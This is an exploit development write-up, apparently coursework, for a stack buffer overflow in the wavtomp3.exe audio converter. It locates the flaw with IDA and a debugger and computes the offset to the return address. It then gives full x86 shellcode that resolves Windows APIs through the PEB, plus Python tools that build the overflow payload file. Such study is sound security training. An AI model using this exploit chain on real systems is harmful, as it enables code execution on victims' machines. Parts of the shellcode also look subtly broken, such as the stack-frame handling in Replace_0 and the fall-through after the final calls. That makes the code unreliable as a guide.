Vulnerable software
The target is an audio format converter called wavtomp3.exe. Its interface is as follows:
Process record
Locate vulnerability points
The courseware gives only pseudocode for the vulnerable code, so there is little to go on. Fortunately, the key snippet shows that a check is made inside the loop, and that check calls the function sub_4B9C6C.
This suggests an approach: use sub_4B9C6C as a landmark and follow IDA's cross references to it to find the VA of the vulnerable code.
Fortunately, this function is called only a few times in the main module, so the call sites can be compared by hand. Otherwise, the IDA pseudocode would have to be translated back into assembly manually and an IDA script written to do the comparison.
After comparing the five cross references one by one, the vulnerable code can be found.
The starting address of this function is 4BA820.
A digression on __usercall: this is the label IDA uses for a nonstandard, compiler-specific calling convention. It usually shows up only when the compiler was run with full optimization enabled. Its defining feature is that arguments may be passed in arbitrary registers, and where the convention applies is decided by the compiler.
Back to the topic. The assembly code corresponding to the pseudocode of the vulnerable spot is as follows:
Once the vulnerable spot is found, set a breakpoint at the corresponding VA in OllyDbg or WinDbg.
Locate the action that triggers the vulnerability
Once you have the VA of the vulnerable code, the next question is which user action triggers it. Generally there are three ways to find out, falling into two categories (manual and automated):
- Analyze the binary in IDA, find characteristic functions such as those that read text box contents or open files, and work out the triggering action from how the application uses them;
- Find the triggering action by repeated manual attempts in the application;
- Use an existing fuzzing framework to traverse all paths automatically.
The automated approach is more trouble to set up, so I tried manual analysis first. IDA's call graph offers little information.
There is only one level of caller above the function, with no symbol information, and the function at 4B9D08 is called through a function pointer. This means simple static analysis cannot determine which action reaches the path that triggers the vulnerability.
Next, let's sort out what we know. In the pseudocode of the vulnerable spot, the loop is clearly copying or validating the v30 variable. v30 is allocated on the stack, so it is quite likely that this code is a copy. Given how much space is allocated, the copy is probably of a string or of file contents.
Next, take a look at the application itself. It converts WAV to MP3 and its interface is fairly simple, which keeps the workload of manual testing small.
There is also an Option dialog.
Then try the features one by one.
In the end, the action that triggers the vulnerability turned out to be the playback function after a music file has been loaded.
Moreover, the spot that actually overflows is not the one located above: it is the other branch of the same if/else. Both are overflow vulnerabilities, though, so the difference is small.
After the copy completes, you can see that the contents of the v30 variable match the contents of the file.
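Since the buffer ends up holding the file contents byte for byte, one common way to confirm which file offset lands on the return address is to load a file filled with a non-repeating pattern. The original write-up does not do this (it reads the addresses from the debugger instead), so the following is only a sketch of that alternative. The function names are hypothetical, and whether the application requires a valid WAV header before it reaches the copy is not stated in the original, so the sketch produces raw bytes only.

```python
import string


def cyclic_pattern(length: int) -> bytes:
    """Build an 'Aa0Aa1Aa2...' pattern in which every 4-byte window is unique."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode("ascii")
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("requested length exceeds the 20280-byte pattern limit")


def pattern_offset(pattern: bytes, needle: bytes) -> int:
    """Return the file offset of a 4-byte value, or -1 if it is not in the pattern.

    `needle` must be given in memory order, i.e. the bytes as they appear in
    the stack dump, not the little-endian integer shown in a register.
    """
    return pattern.find(needle)
```

To use it, write `cyclic_pattern(5000)` to a file, load and play that file under the debugger, and pass the four bytes found in the return address slot to `pattern_offset`.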
Confirming the exploitation method
Looking through the functions in IDA turns up no stack overflow protection routine (such as a security cookie check), so it is safe to conclude that the application was built without the GS protection option.
A plain stack overflow is therefore enough for arbitrary code execution. First, locate the stack address that holds the return address used by the overflowed function's ret instruction: 0019FA60
Then confirm the start address of the buffer: 0019EA40
Subtracting the two (0019FA60 - 0019EA40 = 0x1020 bytes) gives the space that ShellCode + Padding must occupy.
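The subtraction can be written out as a quick check. This is a minimal sketch using the two addresses quoted above; the constant and function names are my own, and the addresses will differ on another machine or run.

```python
RET_SLOT = 0x0019FA60   # stack address holding the return address (from the debugger)
BUF_START = 0x0019EA40  # first byte of the overflowed buffer (from the debugger)


def overflow_length(buf_start: int, ret_slot: int) -> int:
    """Number of bytes between the buffer start and the return address slot."""
    if ret_slot <= buf_start:
        raise ValueError("return address slot must lie above the buffer start")
    return ret_slot - buf_start


length = overflow_length(BUF_START, RET_SLOT)
print(hex(length), length)  # prints: 0x1020 4128
```

So ShellCode plus padding must total 0x1020 (4128) bytes, and the next four bytes of the file overwrite the return address.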
Writing the ShellCode
For how to write ShellCode, see this article: https://blog.csdn.net/x_nirvana/article/details/68921334
In summary, the following points should be noted:
- Absolute addresses cannot be used, because the address at which the ShellCode ends up in memory is not known in advance;
- System APIs cannot be called directly, because the DLLs that provide them may not be loaded into memory;
- Special characters such as '\0' must not appear in the ShellCode, because functions such as strcpy stop at '\0' and would truncate the Payload;
- jmp and call instructions within the segment can be used directly in the ShellCode, because they use relative addressing.
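The third point is easy to check mechanically before building a payload. The helper below is a hypothetical sketch, not part of the original tooling: it reports the position of every forbidden byte in an assembled ShellCode. Which bytes count as forbidden depends on the copy routine in the target, so the default of a single NUL byte is an assumption.

```python
def find_bad_bytes(shellcode: bytes, bad: bytes = b"\x00") -> list:
    """Return (offset, value) pairs for every byte of `shellcode` found in `bad`."""
    return [(offset, value) for offset, value in enumerate(shellcode) if value in bad]


# "xor ecx, ecx" followed by "mov eax, 0": the immediate contributes four NUL bytes
with_nulls = bytes.fromhex("31c9b800000000")
# "xor eax, eax" followed by "xor ecx, ecx": same effect on eax, no NUL bytes
without_nulls = bytes.fromhex("31c031c9")

print(find_bad_bytes(with_nulls))     # [(3, 0), (4, 0), (5, 0), (6, 0)]
print(find_bad_bytes(without_nulls))  # []
```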
The article above solves the second and third points well, but for the first point its author simply avoids variables and strings altogether. I find that approach too unfriendly to write, so I modified the author's ShellCode assembly as follows:
    call BaseAddr
BaseAddr:
    pop ebx
    push ebx
    jmp RealStart

;Data area
GetProcAddress_F_Offset equ $-BaseAddr
GetProcAddress_F: dd '0'
LoadLibrary_F_Offset equ $-BaseAddr
LoadLibrary_F: dd '0'
User32_Str_Offset equ $-BaseAddr
User32_Str: db 'User32.dll$'
MessageBox_A_Offset equ $-BaseAddr
MessageBox_A_: db 'MessageBoxA$'
User32_Base_Offset equ $-BaseAddr
User32_Base: dd '0'
Hack_String_Offset equ $-BaseAddr
Hack_String: dd 'You Are Hacked !$'
;Data area

RealStart:
    xor ecx, ecx
    mov eax, [fs: ecx + 0x30]       ; EAX = PEB
    mov eax, [eax + 0xc]            ; EAX = PEB->Ldr
    mov esi, [eax + 0x14]           ; ESI = PEB->Ldr.InMemOrder
    lodsd                           ; EAX = Second module
    xchg eax, esi                   ; EAX = ESI, ESI = EAX
    lodsd                           ; EAX = Third(kernel32)
    mov ebx, [eax + 0x10]           ; EBX = Base address
    mov edx, [ebx + 0x3c]           ; EDX = DOS->e_lfanew
    add edx, ebx                    ; EDX = PE Header
    mov edx, [edx + 0x78]           ; EDX = Offset export table
    add edx, ebx                    ; EDX = Export table
    mov esi, [edx + 0x20]           ; ESI = Offset namestable
    add esi, ebx                    ; ESI = Names table
    xor ecx, ecx                    ; ECX = 0

Get_Function:
    inc ecx                         ; Increment the ordinal
    lodsd                           ; Get name offset
    add eax, ebx                    ; Get function name
    cmp dword [eax], 0x50746547     ; GetP
    jnz Get_Function
    cmp dword [eax + 0x4], 0x41636f72 ; rocA
    jnz Get_Function
    cmp dword [eax + 0x8], 0x65726464 ; ddre
    jnz Get_Function
    mov esi, [edx + 0x24]           ; ESI = Offset ordinals
    add esi, ebx                    ; ESI = Ordinals table
    mov cx, [esi + ecx * 2]         ; Number of function
    dec ecx
    mov esi, [edx + 0x1c]           ; Offset address table
    add esi, ebx                    ; ESI = Address table
    mov edx, [esi + ecx * 4]        ; EDX = Pointer(offset)
    add edx, ebx                    ; EDX = GetProcAddress

    push ebx
    add esp,4
    pop ebx
    mov [ebx+GetProcAddress_F_Offset],edx
    push ebx
    sub esp,4
    pop ebx

    xor ecx, ecx                    ; ECX = 0
    push ebx                        ; Kernel32 base address
    push edx                        ; GetProcAddress
    push ecx                        ; 0
    push 0x41797261                 ; aryA
    push 0x7262694c                 ; Libr
    push 0x64616f4c                 ; Load
    push esp                        ; "LoadLibrary"
    push ebx                        ; Kernel32 base address
    call edx                        ; GetProcAddress(LL)
    add esp, 0xc                    ; pop "LoadLibrary"
    pop ecx                         ; ECX = 0

    add esp,8
    pop ebx
    mov [ebx+LoadLibrary_F_Offset],eax
    push ebx
    sub esp,8

    mov edx,ebx
    add edx,User32_Str_Offset
    push edx
    call Replace_0
    add esp,4
    push ebx
    push edx
    mov edx,[ebx+LoadLibrary_F_Offset]
    call edx
    pop ebx                         ;load user32.dll
    mov [ebx+User32_Base_Offset],eax

    mov edx,ebx
    add edx,MessageBox_A_Offset
    push edx
    call Replace_0
    add esp,4
    push edx
    mov edx,[ebx+User32_Base_Offset]
    push edx
    mov edx,[ebx+GetProcAddress_F_Offset] ;MessageBox_A_
    call edx
    mov [ebx+MessageBox_A_Offset],eax

    mov edx,ebx
    add edx,Hack_String_Offset
    push edx
    call Replace_0
    add esp,4
    push 0
    push edx
    push edx
    push 0
    mov eax,[ebx+MessageBox_A_Offset]
    call eax

    mov edx,[ebx+GetProcAddress_F_Offset]
    call edx
    add esp,4
    pop ebx                         ;load user32.dll
    mov edx,[ebx+LoadLibrary_F_Offset]

Replace_0:
    push esp
    mov ebp,esp
    mov eax,[ebp+8]
Replace_0_loop:
    cmp byte [eax],'$'
    jz Replace_0_Ret
    inc eax
    jmp Replace_0_loop
Replace_0_Ret:
    mov byte[eax],0
    mov eax,0
    mov esp,ebp
    pop esp
    ret
The idea is to use the call instruction to capture the address at which the ShellCode is executing in a register such as ebx (call pushes the address of the next instruction, which pop then retrieves), and then to address every variable as base plus offset. In addition, if a variable must contain a 0 byte, that byte has to be patched in at run time. For example, the Replace_0 function in my ShellCode replaces the custom string terminator '$' with '\0'.
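To make the terminator patching concrete, here is a small Python emulation of what Replace_0 does to memory. It is only an illustration: the function name is hypothetical, and a bytearray stands in for the ShellCode's data area, with the index playing the role of the base-plus-offset address.

```python
def replace_terminator(memory: bytearray, start: int, marker: bytes = b"$") -> int:
    """Scan forward from `start`, overwrite the first marker byte with NUL.

    Returns the index that was patched. Raises ValueError if no marker is
    found, whereas the assembly version would keep scanning past the data.
    """
    index = memory.index(marker, start)
    memory[index] = 0
    return index


# Two '$'-terminated strings laid out back to back, as in the data area
data = bytearray(b"User32.dll$MessageBoxA$")

first = replace_terminator(data, 0)    # patches the '$' after "User32.dll"
second = replace_terminator(data, 11)  # patches the '$' after "MessageBoxA"
print(first, second, bytes(data))      # 10 22 b'User32.dll\x00MessageBoxA\x00'
```

Each string becomes a valid NUL-terminated C string only at run time, so the assembled bytes of the strings themselves carry no 0 byte.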
Reinventing the wheel: automatic Payload generation
The workflow of writing ShellCode -> manually extracting and copying the bytecode -> appending padding -> generating the payload is tedious and inefficient, so I wrote a Python script that wraps up the last three steps. Tools like this do exist online, but from what I found they are sparsely documented and not very friendly to newcomers, so I reinvented the wheel, as shown below:
import os
import re


class ExpProcessor:
    ShellCodeBeginIndex = "ShellcodeBegin"
    ShellCodeEndIndex = "ShellcodeEnd"

    def __init__(self, FilePath):
        # Path of the NASM source file that contains the ShellCode
        self.ShellCodePath = FilePath
        # Intermediate files are created in the current working directory
        self.TmpPath = os.path.join(os.getcwd(), "NasmTmp.asm")
        self.TmpObjPath = os.path.join(os.getcwd(), "ExpObj.o")
        self.TmpDisassemblyPath = os.path.join(os.getcwd(), "ExpDisassembly.txt")
        self.TmpElfHeaderPath = os.path.join(os.getcwd(), "ElfHeaderInformation.txt")
        self.ShellCode = bytearray()
        self.BeginOffset = 0
        self.EndOffset = 0
        self.TextSeg_Offset = 0
        self.Length = 0
        self.ShellCode_VA = b""

    def __Nasm(self):
        # Assemble the wrapped source into a 32-bit ELF object file
        os.system('nasm -f elf "{}" -o "{}"'.format(self.TmpPath, self.TmpObjPath))

    def __Splicing(self):
        # Wrap the ShellCode between two labels so their offsets can be read from objdump
        with open(self.ShellCodePath, 'r') as ShellcodeFile:
            ShellCodeTxt = ShellcodeFile.read()
        with open(self.TmpPath, 'w') as TmpFile:
            TmpFile.write("global start\n")
            TmpFile.write("start:\n")
            TmpFile.write("nop\n")
            TmpFile.write("{}:\n".format(self.ShellCodeBeginIndex))
            TmpFile.write(ShellCodeTxt + '\n')
            TmpFile.write("{}:\n".format(self.ShellCodeEndIndex))
            # Trailing instruction so the end label shows up in the disassembly
            TmpFile.write("nop\n")

    def __Get_ShellCode_Offset(self):
        # '>' overwrites any output left over from a previous run
        os.system('objdump -d -f "{}" > "{}"'.format(self.TmpObjPath, self.TmpDisassemblyPath))
        BeginPattern = r'([0-9A-Fa-f]{{8}})\s<{}>:'.format(self.ShellCodeBeginIndex)
        EndPattern = r'([0-9A-Fa-f]{{8}})\s<{}>:'.format(self.ShellCodeEndIndex)
        with open(self.TmpDisassemblyPath, 'r') as DisassemblyFile:
            for line in DisassemblyFile:
                Begin = re.match(BeginPattern, line)
                if Begin:
                    self.BeginOffset = int(Begin.group(1), 16)
                End = re.match(EndPattern, line)
                if End:
                    self.EndOffset = int(End.group(1), 16)

    def __Get_TextSegment_Offset(self):
        os.system('readelf -S "{}" > "{}"'.format(self.TmpObjPath, self.TmpElfHeaderPath))
        with open(self.TmpElfHeaderPath, 'r') as ElfHeader_File:
            for line in ElfHeader_File:
                if ".text" in line:
                    # The 8-digit column is the section address; the next column is its file offset
                    Match = re.search(r'[0-9a-fA-F]{8}\s([0-9a-fA-F]+)\s', line)
                    if Match:
                        self.TextSeg_Offset = int(Match.group(1), 16)
                        break

    def Set_Length(self, Length):
        # Distance in bytes from the buffer start to the overwrite point
        self.Length = Length

    def Set_ShellVA(self, VA):
        # Address the overwritten return address should point to (little-endian)
        self.ShellCode_VA = VA.to_bytes(4, 'little')

    def __Get_ShellCode(self):
        self.__Splicing()
        self.__Nasm()
        self.__Get_ShellCode_Offset()
        self.__Get_TextSegment_Offset()
        with open(self.TmpObjPath, 'rb') as Bin_File:
            Bin_File.seek(self.TextSeg_Offset + self.BeginOffset, 0)
            self.ShellCode = bytearray(Bin_File.read(self.EndOffset - self.BeginOffset))

    def Process_ShellCode(self):
        self.__Get_ShellCode()

    def Get_ShellCode_C(self, FilePath=None):
        # Emit the ShellCode as a C byte array
        Body = ",".join(hex(i) for i in self.ShellCode)
        ShellCode = "\nunsigned char ShellCode[]={\n" + Body + "\n};\n"
        print(ShellCode)
        if FilePath:
            with open(FilePath, 'w') as OutFile:
                OutFile.write(ShellCode)
        return ShellCode

    def Get_Exp_File(self, FilePath):
        # Layout: ShellCode | 'A' padding | 4 x 'B' | return address
        with open(FilePath, 'wb') as OutFile:
            OutFile.write(self.ShellCode)
            OutFile.write(b'A' * (self.Length - len(self.ShellCode) - 4))
            OutFile.write(b'B' * 4)
            OutFile.write(self.ShellCode_VA)
The script must run in an environment with NASM, objdump and readelf installed. It must be given the start address of the buffer and the length from the start of the buffer to the overwrite point (the stack return address or an exception handler pointer).
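The file layout the script produces can be shown in isolation. The function below is a standalone sketch of that layout, not a replacement for the script: `build_payload` is a hypothetical name, the 16 NOP bytes stand in for real ShellCode, and the length and address are the values quoted earlier in this write-up.

```python
def build_payload(shellcode: bytes, length: int, ret_va: int) -> bytes:
    """Lay out: shellcode | 'A' filler | 4 x 'B' | little-endian return address.

    `length` is the distance from the buffer start to the return address slot.
    """
    filler = length - len(shellcode) - 4
    if filler < 0:
        raise ValueError("shellcode does not fit in front of the return address")
    return shellcode + b"A" * filler + b"B" * 4 + ret_va.to_bytes(4, "little")


# Placeholder shellcode; 0x1020 and 0x0019EA40 are the values from the debugger session
payload = build_payload(b"\x90" * 16, 0x1020, 0x0019EA40)
print(len(payload))        # 4132
print(payload[-4:].hex())  # 40ea1900
```

The four 'B' bytes sit directly below the return address, and the final four bytes redirect execution to the start of the buffer, where the ShellCode begins.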